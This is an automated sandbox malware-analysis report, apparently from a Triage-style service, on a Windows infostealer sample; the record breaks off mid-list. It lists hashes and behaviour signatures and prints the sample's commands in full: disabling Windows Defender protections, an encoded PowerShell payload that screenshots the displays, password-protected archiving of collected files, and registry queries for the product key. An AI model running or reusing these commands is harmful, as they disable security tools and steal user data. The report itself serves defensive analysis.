Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250410-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/04/2025, 19:02

General

  • Target

    turan k$yser [email protected]

  • Size

    7.8MB

  • MD5

    94dd93a1e09594567ba2f0bc1af13927

  • SHA1

    3d32ca71a96033eb2f9bfe18d9ae7eceea1d1951

  • SHA256

    79bdb910cdbac46bd809d30d00fbffbc4ec040e1149db4e3bd2675bfc7f1cfef

  • SHA512

    e03268ad5a8f23eb2ddaa0a7488b26291360dc5ad52500f4e058ca90be61c8f91e4d61a3e4bbcac3331b6c53dafd6b827b5a60d653a40a0d593ea6aaa818fde8

  • SSDEEP

    196608:KW5HUOXXKApTj9fZwQRCgiIKpdzjPOan7j2y283TOnOt:dxBw8wIKppDO9it

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • UPX packed file 49 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\turan k$yser [email protected]
    "C:\Users\Admin\AppData\Local\Temp\turan k$yser [email protected]"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3036
    • C:\Users\Admin\AppData\Local\Temp\turan k$yser [email protected]
      "C:\Users\Admin\AppData\Local\Temp\turan k$yser [email protected]"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2300
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\turan k$yser [email protected]'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2260
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\turan k$yser [email protected]'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5008
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4692
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3828
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5100
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3368
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1788
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1676
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4464
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oxrigczk\oxrigczk.cmdline"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2776
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES850E.tmp" "c:\Users\Admin\AppData\Local\Temp\oxrigczk\CSC817B7E56C215490482FE2CCB3EEB59F.TMP"
              6⤵
                PID:1772
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI30362\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\EtFBx.zip" *"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:384
          • C:\Users\Admin\AppData\Local\Temp\_MEI30362\rar.exe
            C:\Users\Admin\AppData\Local\Temp\_MEI30362\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\EtFBx.zip" *
            4⤵
            • Executes dropped EXE
            PID:3296
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1436
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic os get Caption
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3080
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3948
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic computersystem get totalphysicalmemory
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1360
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2012
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
              PID:2768
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2884
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1984
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:5040
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:5008
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1888
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:5000
      • C:\Windows\system32\BackgroundTransferHost.exe
        "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
        1⤵
          PID:2776
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\EditStep.cmd" "
          1⤵
            PID:4208
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\EditStep.cmd" "
            1⤵
              PID:4176
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\EditStep.cmd" "
              1⤵
                PID:4088
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\EditStep.cmd" "
                1⤵
                  PID:2896
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe"
                  1⤵
                  • Checks processor information in registry
                  • Enumerates system info in registry
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of WriteProcessMemory
                  PID:2696
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffc1131dcf8,0x7ffc1131dd04,0x7ffc1131dd10
                    2⤵
                      PID:864
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1908,i,291996042965609920,6551864802554276902,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=1860 /prefetch:2
                      2⤵
                        PID:3424
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2260,i,291996042965609920,6551864802554276902,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2300 /prefetch:3
                        2⤵
                          PID:2080
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2392,i,291996042965609920,6551864802554276902,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2560 /prefetch:8
                          2⤵
                            PID:3272
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3224,i,291996042965609920,6551864802554276902,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3244 /prefetch:1
                            2⤵
                              PID:3456
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3104,i,291996042965609920,6551864802554276902,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3308 /prefetch:1
                              2⤵
                                PID:3696
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4468,i,291996042965609920,6551864802554276902,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4484 /prefetch:2
                                2⤵
                                  PID:376
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4736,i,291996042965609920,6551864802554276902,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4780 /prefetch:1
                                  2⤵
                                    PID:2600
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5400,i,291996042965609920,6551864802554276902,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5412 /prefetch:8
                                    2⤵
                                      PID:4576
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5488,i,291996042965609920,6551864802554276902,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5504 /prefetch:8
                                      2⤵
                                        PID:3032
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5364,i,291996042965609920,6551864802554276902,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5640 /prefetch:1
                                        2⤵
                                          PID:4568
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5788,i,291996042965609920,6551864802554276902,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5760 /prefetch:1
                                          2⤵
                                            PID:3820
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
